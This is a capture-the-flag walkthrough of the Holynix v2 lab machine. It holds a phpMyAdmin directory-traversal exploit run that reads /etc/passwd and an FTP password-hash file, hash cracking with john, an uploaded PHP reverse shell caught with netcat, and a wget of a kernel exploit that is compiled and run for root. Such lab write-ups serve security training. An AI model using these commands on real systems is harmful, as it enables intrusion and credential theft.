Holynix: v2 – Walkthrough

So busy with my personal but it time to exploit the box at today. This box is second of the Holynix. I have to do many today. OK. Try to exploit the box.

After network scanning VMware is running at ip address 192.168.1.88. So my target is 192.168.1.88

┌─[[email protected]]─[~]
└──> netdiscover

 Currently scanning: 192.168.19.0/16   |   Screen View: Unique Hosts           
                                                                               
 8 Captured ARP Req/Rep packets, from 6 hosts.   Total size: 480               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.1     60:e3:27:be:75:78      1      60  TP-LINK TECHNOLOGIES CO.,LTD
 192.168.1.70    98:fa:e3:48:32:38      1      60  Xiaomi Communications Co Ltd
 192.168.1.75    28:e3:47:86:cd:48      1      60  Liteon Technology Corporatio
 192.168.1.88    00:0c:29:13:21:b3      2     120  VMware, Inc.                
 192.168.1.100   34:97:f6:c3:0b:66      2     120  ASUSTek COMPUTER INC.       
 192.168.1.105   40:a5:ef:dc:a7:62      1      60  Shenzhen Four Seas Global Li

Nmap again!

┌─[[email protected]]─[~]
└──> nmap -sV 192.168.1.88

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-03 12:01 +0630
Nmap scan report for 192.168.1.88
Host is up (0.00083s latency).
Not shown: 995 filtered ports
PORT   STATE  SERVICE  VERSION
20/tcp closed ftp-data
21/tcp open   ftp      Pure-FTPd
22/tcp open   ssh      OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
53/tcp open   domain   ISC BIND 9.4.2-P2.1
80/tcp open   http     Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch)
MAC Address: 00:0C:29:13:21:B3 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.99 seconds

FTP anonymous login not working well. Time to explore port 80 and scan with dirb.

┌─[[email protected]]─[~]
└──> dirb http://192.168.1.88 -r

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Jan  3 12:04:58 2018
URL_BASE: http://192.168.1.88/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.88/ ----
+ http://192.168.1.88/index (CODE:200|SIZE:1205)                                                                                                   
+ http://192.168.1.88/index.php (CODE:200|SIZE:1205)                                                                                               
+ http://192.168.1.88/phpMyAdmin (CODE:403|SIZE:330)                                                                                               
+ http://192.168.1.88/register (CODE:200|SIZE:16)                                                                                                  
+ http://192.168.1.88/server-status (CODE:403|SIZE:333)                                                                                            
                                                                                                                                                   
-----------------
END_TIME: Wed Jan  3 12:05:01 2018
DOWNLOADED: 4612 - FOUND: 5

I found one form at index.php. I try to login sql query bypass to test vulnerable or not also try other vulnerable method such as File inclusion,xss,rce but fail. I also check the phpMyAdmin but it is forbidden.

Ok now i check the port 53.

http://192.168.1.88:53/

Domain was  restricted. I need to dig the IP address with domain name zincftp.com.

┌─[[email protected]]─[~]
└──> dig www.zincftp.com @192.168.1.88 

; <<>> DiG 9.10.6-Debian <<>> www.zincftp.com @192.168.1.88
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4896
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 3

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;www.zincftp.com.		IN	A

;; ANSWER SECTION:
www.zincftp.com.	38400	IN	A	192.168.1.88

;; AUTHORITY SECTION:
zincftp.com.		38400	IN	NS	ns2.zincftp.com.
zincftp.com.		38400	IN	NS	ns1.zincftp.com.

;; ADDITIONAL SECTION:
ns1.zincftp.com.	38400	IN	A	192.168.1.88
ns2.zincftp.com.	38400	IN	A	192.168.1.89

;; Query time: 0 msec
;; SERVER: 192.168.1.88#53(192.168.1.88)
;; WHEN: Wed Jan 03 12:16:05 +0630 2018
;; MSG SIZE  rcvd: 128

I try to transfer but fail!.

┌─[[email protected]]─[~]
└──> dig www.zincftp.com @192.168.1.88 axfr

; <<>> DiG 9.10.6-Debian <<>> www.zincftp.com @192.168.1.88 axfr
;; global options: +cmd
; Transfer failed.

Ok. now i change my ip address to point.

┌─[[email protected]]─[~]
└──> ifconfig eth0 192.168.1.89/24 up
┌─[[email protected]]─[~]
└──> ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.89  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::a00:27ff:fee3:4519  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:e3:45:19  txqueuelen 1000  (Ethernet)
        RX packets 193470  bytes 219356737 (209.1 MiB)
        RX errors 0  dropped 443  overruns 0  frame 0
        TX packets 339452  bytes 28046011 (26.7 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Dig again!.

┌─[[email protected]]─[~]
└──> dig zincftp.com @192.168.1.88 axfr

; <<>> DiG 9.10.6-Debian <<>> zincftp.com @192.168.1.88 axfr
;; global options: +cmd
zincftp.com.		38400	IN	SOA	ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
zincftp.com.		38400	IN	NS	ns1.zincftp.com.
zincftp.com.		38400	IN	NS	ns2.zincftp.com.
zincftp.com.		38400	IN	MX	10 mta.zincftp.com.
zincftp.com.		38400	IN	A	192.168.1.88
ahuxley.zincftp.com.	38400	IN	A	192.168.1.88
amckinley.zincftp.com.	38400	IN	A	192.168.1.88
bzimmerman.zincftp.com.	38400	IN	A	192.168.1.88
cbergey.zincftp.com.	38400	IN	A	192.168.1.88
cfinnerly.zincftp.com.	38400	IN	A	192.168.1.88
cjalong.zincftp.com.	38400	IN	A	192.168.1.88
cmahong.zincftp.com.	38400	IN	A	192.168.1.88
cmanson.zincftp.com.	38400	IN	A	192.168.1.88
ddonnovan.zincftp.com.	38400	IN	A	192.168.1.88
ddypsky.zincftp.com.	38400	IN	A	192.168.1.88
dev.zincftp.com.	38400	IN	A	192.168.1.88
dhammond.zincftp.com.	38400	IN	A	192.168.1.88
dmoran.zincftp.com.	38400	IN	A	192.168.1.88
dsummers.zincftp.com.	38400	IN	A	192.168.1.88
evorhees.zincftp.com.	38400	IN	A	192.168.1.88
gwelch.zincftp.com.	38400	IN	A	192.168.1.88
hmcknight.zincftp.com.	38400	IN	A	192.168.1.88
jgacy.zincftp.com.	38400	IN	A	192.168.1.88
jsmith.zincftp.com.	38400	IN	A	192.168.1.88
jstreet.zincftp.com.	38400	IN	A	192.168.1.88
kmccallum.zincftp.com.	38400	IN	A	192.168.1.88
lnickerbacher.zincftp.com. 38400 IN	A	192.168.1.88
lsanderson.zincftp.com.	38400	IN	A	192.168.1.88
lwestre.zincftp.com.	38400	IN	A	192.168.1.88
mta.zincftp.com.	38400	IN	A	10.0.192.48
ncobol.zincftp.com.	38400	IN	A	192.168.1.88
ns1.zincftp.com.	38400	IN	A	192.168.1.88
ns2.zincftp.com.	38400	IN	A	192.168.1.89
rcropper.zincftp.com.	38400	IN	A	192.168.1.88
rfrost.zincftp.com.	38400	IN	A	192.168.1.88
rwoo.zincftp.com.	38400	IN	A	192.168.1.88
skrymple.zincftp.com.	38400	IN	A	192.168.1.88
splath.zincftp.com.	38400	IN	A	192.168.1.88
tmartin.zincftp.com.	38400	IN	A	192.168.1.88
trusted.zincftp.com.	38400	IN	A	192.168.1.34
www.zincftp.com.	38400	IN	A	192.168.1.88
zincftp.com.		38400	IN	SOA	ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
;; Query time: 0 msec
;; SERVER: 192.168.1.88#53(192.168.1.88)
;; WHEN: Wed Jan 03 12:21:05 +0630 2018
;; XFR size: 42 records (messages 1, bytes 1021)

It work!. Try to access phpMyAdmin but still forbidden. Subdomain also can’t access. :'( .      Ok Let’s try to stranger ip in same network. More digging..

┌─[✗]─[[email protected]]─[~]
└──> dig zincftp.com @192.168.1.88 axfr | grep -Eiv "192.168.1.88"

;; global options: +cmd
zincftp.com.		38400	IN	SOA	ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
zincftp.com.		38400	IN	NS	ns1.zincftp.com.
zincftp.com.		38400	IN	NS	ns2.zincftp.com.
zincftp.com.		38400	IN	MX	10 mta.zincftp.com.
mta.zincftp.com.	38400	IN	A	10.0.192.48
ns2.zincftp.com.	38400	IN	A	192.168.1.89
trusted.zincftp.com.	38400	IN	A	192.168.1.34
zincftp.com.		38400	IN	SOA	ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400
;; Query time: 0 msec
;; WHEN: Wed Jan 03 12:25:09 +0630 2018
;; XFR size: 42 records (messages 1, bytes 1021)

Notice that one subdomain point to 192.168.1.34. Ok try to change the point ip address.

┌─[[email protected]]─[~]
└──> ifconfig eth0 192.168.1.34/24 up

Yeah! Now i can access the phpMyAdmin.

 

Try to outfile with sql query but just found error message.

MySQL said:


#1045 - Access denied for user 'phpadmin'@'localhost' (using password: YES)

 

Now i check phpMyAdmin version at change_log file.

---------------------
phpMyAdmin - Changelog
----------------------

$Id: ChangeLog,v 2.1238.2.12 2005/09/15 16:44:29 lem9 Exp $
$Source: /cvsroot/phpmyadmin/phpMyAdmin/ChangeLog,v $

2005-09-15 Marc Delisle  <[email protected]>
    ### 2.6.4-pl1 released

phpMyadmin final version is 2.6.4. Try to search with this version number at exploit-db.

┌─[[email protected]]─[~]
└──> searchsploit phpMyAdmin | grep 2.6.4
phpMyAdmin 2.6.4-pl1 - Directory Traversal                                      | exploits/php/webapps/1244.pl

Ok. Time to exploit it.

┌─[[email protected]]─[~]
└──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../../etc/passwd

ATTACK HOST IS: http://192.168.1.88

HTTP/1.1 200 OK
Date: Wed, 03 Jan 2018 11:11:51 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 2604
Connection: close
Content-Type: text/html

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
bind:x:104:111::/var/cache/bind:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:106:115:MySQL Server,,,:/var/lib/mysql:/bin/false
lsanderson:x:1000:114:Lyle Sanderson:/home/lsanderson:/bin/bash
cfinnerly:x:1001:100:Chuck Finnerly:/home/cfinnerly:/bin/bash
ddonnovan:x:1002:100:David Donnovan:/home/ddonnovan:/bin/bash
skrymple:x:1003:100:Shelly Krymple:/home/skrymple:/bin/bash
amckinley:x:1004:100:Agustin Mckinley:/home/amckinley:/bin/bash
cmahong:x:1005:2002::/home/cmahong:/bin/false
lnickerbacher:x:1006:2002::/home/lnickerbacher:/bin/false
jstreet:x:1007:2002::/home/jstreet:/bin/false
rwoo:x:1008:2002::/home/rwoo:/bin/false
kmccallum:x:1009:2002::/home/kmccallum:/bin/false
cjalong:x:1010:2002::/home/cjalong:/bin/false
jsmith:x:1011:2002::/home/jsmith:/bin/false
dhammond:x:1012:2002::/home/dhammond:/bin/false
hmcknight:x:1013:2002::/home/hmcknight:/bin/false
lwestre:x:1014:2002::/home/lwestre:/bin/false
gwelch:x:1015:2002::/home/gwelch:/bin/false
dmoran:x:1016:2002::/home/dmoran:/bin/false
dsummers:x:1017:2002::/home/dsummers:/bin/false
bzimmerman:x:1018:2002::/home/bzimmerman:/bin/false
ncobol:x:1019:2002::/home/ncobol:/bin/false
ddypsky:x:1020:2002::/home/ddypsky:/bin/false
rcropper:x:1021:2002::/home/rcropper:/bin/false
cbergey:x:1022:2002::/home/cbergey:/bin/false
tmartin:x:1023:2002::/home/tmartin:/bin/false
jgacy:x:1024:2002::/home/jgacy:/bin/false
splath:x:1025:2002::/home/splath:/bin/false
evorhees:x:1026:2002::/home/evorhees:/bin/false
rfrost:x:1027:2002::/home/rfrost:/bin/false
ahuxley:x:1028:2002::/home/ahuxley:/bin/false
webmaster:x:1029:2002::/var/www:/bin/false
cmanson:x:1030:2002::/home/cmanson:/bin/false
vftp:x:1031:2002:Virtual FTP User:/dev/null:/bin/false

It work. i check there are 5 users can access ssh login.

lsanderson:x:1000:114:Lyle Sanderson:/home/lsanderson:/bin/bash
cfinnerly:x:1001:100:Chuck Finnerly:/home/cfinnerly:/bin/bash
ddonnovan:x:1002:100:David Donnovan:/home/ddonnovan:/bin/bash
skrymple:x:1003:100:Shelly Krymple:/home/skrymple:/bin/bash
amckinley:x:1004:100:Agustin Mckinley:/home/amckinley:/bin/bash

I try to crack using hydra with wordlist rockyou.txt . It take time some hours but still fail.. Thinking can save the time, So need to think more..

I notice the full name of each user and try to generate the wordlist to crack this. Extract first all name from /etc/passwd.

lsanderson
Lyle Sanderson
lylesanderson
cfinnerly
Chuck Finnerly
chuckfinnerly
ddonnovan
David Donnovan
daviddonnovan
skrymple
Shelly Krymple
shellykrymple
amckinley
Agustin Mckinley
agustinmckinley

Combine again with namemash tool.

┌─[[email protected]]─[~/Desktop/tools/namegenerator]
└──> ./namemash.py name.txt 
lsandersonlsanderson
lsanderson.lsanderson
lsandersonl
llsanderson
l.lsanderson
lsanderson
lylesanderson
sandersonlyle
lyle.sanderson
sanderson.lyle
sandersonl
lsanderson
slyle
l.sanderson
s.lyle
lyle
[.....]
[.....]
a.agustinmckinley
agustinmckinley

And combine again with 2017 year from 0. I write bash script.

#!/bin/bash
for i in `cat username.txt`
do
	for j in {0..2020}
	do
		echo $i$j
	done
done
┌─[[email protected]]─[~/Desktop/tools/namegenerator]
└──> ./byear.sh > sshpass.txt
┌─[[email protected]]─[~/Desktop/tools/namegenerator]
└──> cat sshpass.txt | head -n 6
agustin0
agustin1
agustin2
agustin3
agustin4
agustin5

 

It also not lucky but still cracking… Let’s try other method to find.
I need to check the web host config file again!.

┌─[[email protected]]─[~]
└──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../../var/log/apache2/access.log

ATTACK HOST IS: http://192.168.1.88

HTTP/1.1 200 OK
Date: Wed, 03 Jan 2018 12:26:46 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 564
Connection: close
Content-Type: text/html

<br />
<b>Warning</b>:  require(./../../../../../var/log/apache2/access.log) [<a href='function.require'>function.require</a>]: failed to open stream: Permission denied in <b>/var/www/htdocs/phpMyAdmin/libraries/grab_globals.lib.php</b> on line <b>102</b><br />
<br />
<b>Fatal error</b>:  require() [<a href='function.require'>function.require</a>]: Failed opening required './../../../../../var/log/apache2/access.log' (include_path='.:/usr/share/php:/usr/share/pear') in <b>/var/www/htdocs/phpMyAdmin/libraries/grab_globals.lib.php</b> on line <b>102</b><br />
┌─[[email protected]]─[~]
└──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../../etc/apache2/apache2.conf

ATTACK HOST IS: http://192.168.1.88

HTTP/1.1 200 OK
Date: Wed, 03 Jan 2018 12:27:26 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Connection: close
Content-Type: text/html

#
# Based upon the NCSA server configuration files originally by Rob McCool.
#
# This is the main Apache server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.2/ for detailed information about
# the directives.
#
# Do NOT simply read the instructions in here without understanding
# what they do.  They're here only as hints or reminders.  If you are unsure
# consult the online docs. You have been warned.  
#
# The configuration directives are grouped into three basic sections:
#  1. Directives that control the operation of the Apache server process as a
#     whole (the 'global environment').
#  2. Directives that define the parameters of the 'main' or 'default' server,
#     which responds to requests that aren't handled by a virtual host.
#     These directives also provide default values for the settings
#     of all virtual hosts.
#  3. Settings for virtual hosts, which allow Web requests to be sent to
#     different IP addresses or hostnames and have them handled by the
#     same Apache server process.
#
# Configuration and logfile names: If the filenames you specify for many
# of the server's control files begin with "/" (or "drive:/" for Win32), the
# server will use that explicit path.  If the filenames do *not* begin
# with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log"
# with ServerRoot set to "" will be interpreted by the
# server as "//var/log/apache2/foo.log".
#

### Section 1: Global Environment
#
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests it can handle or where it
# can find its configuration files.
#

#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE!  If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the LockFile documentation (available
# at <URL:http://httpd.apache.org/docs-2.1/mod/mpm_common.html#lockfile>);
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
ServerRoot "/etc/apache2"

#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
#<IfModule !mpm_winnt.c>
#<IfModule !mpm_netware.c>
LockFile /var/lock/apache2/accept.lock
#</IfModule>
#</IfModule>

#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars

Now try to read the site config file.

┌─[[email protected]]─[~]
└──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../../etc/apache2/sites-enabled/000-default

Yes I found another directory setup_guides.. Check it.

http://www.zincftp.com/setup_guides/todo

 

Found again another interest file. So try to read again!.

┌─[[email protected]]─[~]
└──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../..//etc/pure-ftpd/pureftpd.passwd

ATTACK HOST IS: http://192.168.1.88

HTTP/1.1 200 OK
Date: Wed, 03 Jan 2018 12:35:06 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 2602
Connection: close
Content-Type: text/html

cmahong:$1$vUW5q3t0$9RZSkReNoWGCaPtL7ixLX0:1031:2002::/home/cmahong/./::::::::::::
lnickerbacher:$1$yiEZKCE0$BOuvM8nrfoNGWAcjPenpa.:1031:2002::/home/lnickerbacher/./::::::::::::
jstreet:$1$sBGmOuB0$TPHx0jBSFjtJu7dJXb4Nw/:1031:2002::/home/jstreet/./::::::::::::
rwoo:$1$VZxDrE30$p7NPDTkxuQhPSsLpi2a1H1:1031:2002::/home/rwoo/./::::::::::::
cfinnerly:$1$dRGyIOy0$OVGBtLHyxFjPg7tmxtvHY/:1031:2002::/home/cfinnerly/./::::::::::::
kmccallum:$1$dijBzwn0$qlGcbcTT0Qyg8wQf4.QiG1:1031:2002::/home/kmccallum/./::::::::::::
cjalong:$1$FVj4if60$BWSIDiE97oTKUs70qOjZx/:1031:2002::/home/cjalong/./::::::::::::
jsmith:$1$yQKaOpR0$UdySwRtPd1upTckQ5/.CM/:1031:2002::/home/jsmith/./::::::::::::
lsanderson:$1$gzIP52U0$cL6XE61yDZD0unvIIkV8l/:1031:2002::/home/lsanderson/./::::::::::::
dhammond:$1$yK9OuzZ0$W7mgvS4SisxP1BwdLsuy1/:1031:2002::/home/dhammond/./::::::::::::
hmcknight:$1$A07SpdB0$hs/m8KyoJyY3gVAhlWDQI/:1031:2002::/home/hmcknight/./::::::::::::
lwestre:$1$.R5Dbl60$n2ajoJce/LnPVCq497sUQ.:1031:2002::/home/lwestre/./::::::::::::
gwelch:$1$/uYT22Y0$njR3vmLQrbnAugwkNLgJ5/:1031:2002::/home/gwelch/./::::::::::::
dmoran:$1$JZrJXdU0$ORe5.yRgQHCQl6h14rEEe.:1031:2002::/home/dmoran/./::::::::::::
dsummers:$1$VXo3pWp0$v0J7NsxRhDy/ufU01P/ch1:1031:2002::/home/dsummers/./::::::::::::
bzimmerman:$1$rQep6B90$ZtnoFZpTEBkNoRCfqJRpe/:1031:2002::/home/bzimmerman/./::::::::::::
amckinley:$1$45Bz0af0$Fsfo.XXcLkVzSaH5bLjzI0:1031:2002::/home/amckinley/./::::::::::::
ncobol:$1$q.xxgp70$645DFncdOFc24n93la5a70:1031:2002::/home/ncobol/./::::::::::::
ddypsky:$1$ccUhlpJ0$PO/WATKUekwaPct4zXeV9.:1031:2002::/home/ddypsky/./::::::::::::
rcropper:$1$Qhw2Vff0$QDvQMEe9CGFwVrvVUPqTz0:1031:2002::/home/rcropper/./::::::::::::
ddonnovan:$1$1z2APl80$uAyYFZLPu/WRkkpegD3Ht.:1031:2002::/home/ddonnovan/./::::::::::::
cbergey:$1$MOwY3Ie0$LcgARpcVk8Hf8n.E7itC40:1031:2002::/home/cbergey/./::::::::::::
tmartin:$1$3jpH7Yk0$2XmRv6acGEkBjmNQeyzUz.:1031:2002::/home/tmartin/./::::::::::::
jgacy:$1$b.0bYDi0$sSMXaRDSZu8YvWVz.wfCo0:1031:2002::/home/jgacy/./::::::::::::
splath:$1$jbdcsaj0$7uaXto3yRZWwDp5VEbJQV/:1031:2002::/home/splath/./::::::::::::
skrymple:$1$zjyNa1C0$x2JA4Tm61q3N0Fq06gXun1:1031:2002::/home/skrymple/./::::::::::::
evorhees:$1$ITHWZZd0$Qhs38Q7QpRTe./Npk25hu/:1031:2002::/home/evorhees/./::::::::::::
rfrost:$1$3Nqexaj0$eJv5nfOYM71jvlTEA1iv..:1031:2002::/home/rfrost/./::::::::::::
ahuxley:$1$ObpCAT60$LTqCcrqMGAgv8YMyva5Sr0:1031:2002::/home/ahuxley/./::::::::::::
cmanson:$1$gMHNCq70$RCOXC8pfElSRvh5BFc5fF0:1031:2002::/home/cmanson/./::::::::::::
webmaster:$1$v2tdHOX0$MnLOX4cXqZYL99QbDDZ/1/:1031:2002::/var/www/./::::::::::::

Got shadow file and crack with john.

┌─[[email protected]]─[~/Desktop/tools/shadowcracker]
└──> ./formatshadow.py raw.txt > shadow
┌─[[email protected]]─[~/Desktop/tools/shadowcracker]
└──> john shadow --wordlist='/root/Desktop/rockyou.txt' 
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 31 password hashes with 31 different salts (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Remaining 28 password hashes with 28 different salts
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:11 DONE (2018-01-03 14:07) 0g/s 1371p/s 38413c/s 38413C/s 87thebravery87..8570bravo
Session completed
┌─[[email protected]]─[~/Desktop/tools/shadowcracker]
└──> john shadow --show
cbergey:chatterbox1:521:500:,,,:/home/cbergey:/bin/bash
tmartin:millionaire:522:500:,,,:/home/tmartin:/bin/bash
ahuxley:bravenewworld:528:500:,,,:/home/ahuxley:/bin/bash

3 password hashes cracked, 28 left

Ater cracking i got 3 passwords but i know that this 3 users don’t have ssh login access. so i try ftp login. Try 3 login but I just found rar file that protect by password of user tmartin.

┌─[[email protected]]─[~/Desktop/Holy]
└──> ls -al
total 12
drwxr-xr-x 2 root root 4096 Jan  3 14:14 .
drwxr-xr-x 5 root root 4096 Jan  3 14:11 ..
-rw-r--r-- 1 root root 1004 Jan  3 14:14 mystuff.rar

After thinking few minutes later,I being understand all username are deal with subdomain. Ok. i need to check subdomain again with this ftp user login.

Need to change name server to access sub domain.

┌─[✗]─[[email protected]]─[~/Desktop/Holy]
└──> ping cbergey.zincftp.com
ping: cbergey.zincftp.com: Name or service not known
┌─[✗]─[[email protected]]─[~/Desktop/Holy]
└──> echo nameserver 192.168.1.88 > /etc/resolv.conf
┌─[[email protected]]─[~/Desktop/Holy]
└──> ping cbergey.zincftp.com
PING cbergey.zincftp.com (192.168.1.88) 56(84) bytes of data.
64 bytes from www.zincftp.com (192.168.1.88): icmp_seq=1 ttl=64 time=0.291 ms
64 bytes from www.zincftp.com (192.168.1.88): icmp_seq=2 ttl=64 time=0.589 ms
64 bytes from www.zincftp.com (192.168.1.88): icmp_seq=3 ttl=64 time=0.620 ms
^C
--- cbergey.zincftp.com ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2026ms
rtt min/avg/max/mdev = 0.291/0.500/0.620/0.148 ms

Yeah! Access it. Now upload php file to test

┌─[[email protected]]─[~/Desktop/Holy]
└──> ftp 192.168.1.88
Connected to 192.168.1.88.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 5 allowed.
220-Local time is now 04:55. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.1.88:root): cbergey
331 User cbergey OK. Password required
Password:
230-User cbergey has group access to:  2002    
230 OK. Current directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful
150 Connecting to port 60441
drwxr-xr-x    3 1031     2002         4096 Dec  6  2010 .
drwxr-xr-x    3 1031     2002         4096 Dec  6  2010 ..
-rw-r--r--    1 1031     2002          220 Dec  6  2010 .bash_logout
-rw-r--r--    1 1031     2002         2940 Dec  6  2010 .bashrc
-rw-r--r--    1 1031     2002          586 Dec  6  2010 .profile
drwxr-xr-x    2 1031     2002         4096 Dec  6  2010 web
226-Options: -a -l 
226 6 matches total
ftp> cd web
250 OK. Current directory is /web
ftp> ls -al
200 PORT command successful
150 Connecting to port 37881
drwxr-xr-x    2 1031     2002         4096 Dec  6  2010 .
drwxr-xr-x    3 1031     2002         4096 Dec  6  2010 ..
226-Options: -a -l 
226 2 matches total
ftp> put info.php
local: info.php remote: info.php
200 PORT command successful
150 Connecting to port 34115
226-File successfully transferred
226 0.000 seconds (measured here), 52.51 Kbytes per second
20 bytes sent in 0.00 secs (315.0202 kB/s)
ftp> ls -al
200 PORT command successful
150 Connecting to port 54409
drwxr-xr-x    2 1031     2002         4096 Jan  3 12:56 .
drwxr-xr-x    3 1031     2002         4096 Dec  6  2010 ..
-rw-r--r--    1 1031     2002           20 Jan  3 12:56 info.php
226-Options: -a -l 
226 3 matches total

Now upload again the php reverse shell file.

┌─[[email protected]]─[~/Desktop/Holy]
└──> nc -lvp 3333
listening on [any] 3333 ...
connect to [192.168.1.89] from www.zincftp.com [192.168.1.88] 48950
Linux holynix2 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
 05:00:25 up  2:34,  0 users,  load average: 0.07, 0.02, 0.00
USER     TTY      FROM              [email protected]   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[email protected]:/$ uname -a
uname -a
Linux holynix2 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux

Yes i check the ssh login home directory and i get one message. Yo yo i got ssh login password for amckinley.

Full name is Agustin Mckinley and add by 2ba9. Therefore  password will be agustinmckinley2ba9

Login time for ssh.

┌─[[email protected]]─[~/Desktop/Holy]
└──> ssh [email protected]
[email protected]'s password: 
Linux holynix2 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
[email protected]:~$ sudo -l
User amckinley may run the following commands on this host:
    (root) NOPASSWD: /bin/false

Success . Nee to root again!. Kernel version is 2.6.22 2007 old kernel.

Finally i found the right exploit to root.  https://www.exploit-db.com/exploits/5092/

[email protected]:/tmp$ wget https://www.exploit-db.com/raw/5092/ -O rootme.c --no-check-certificate
--05:25:36--  https://www.exploit-db.com/raw/5092/
           => `rootme.c'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 6,580 (6.4K) [text/plain]

100%[======================================================================================================>] 6,580         --.--K/s             

05:25:38 (677.66 MB/s) - `rootme.c' saved [6580/6580]

[email protected]:/tmp$ gcc rootme.c && ./a.out
